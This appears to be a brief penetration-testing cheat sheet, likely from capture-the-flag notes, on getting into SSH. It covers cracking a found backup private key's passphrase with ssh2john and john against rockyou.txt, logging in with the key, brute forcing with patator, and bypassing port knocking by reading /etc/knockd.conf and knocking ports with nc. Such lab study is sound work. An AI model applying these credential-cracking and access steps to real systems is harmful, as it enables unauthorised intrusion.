Cracking ssh

Did you find a backup private key?

  1. ssh2john private key to generate a hash


john --wordlist=/usr/share/wordlists/rockyou.txt hash

*use the directory you are storing rockyou.txt

Log in using the pass key along with the private key.

ssh -i id_rsa.bak joanna@IP

use patator for Brute Forcing

If ssh is filtered, you may try this!

  • /proc/sched_debug is useful sometimes.

    • if "knockd" exists, it's a port knocking service --> which means some ports may have filters.

    • /etc/knockd.conf

it may look like this.

In this case, to access SSH, we need to access 7569, 8475,9842 in the correct order.

  • access these ports with nc and then try to ssh.

Last updated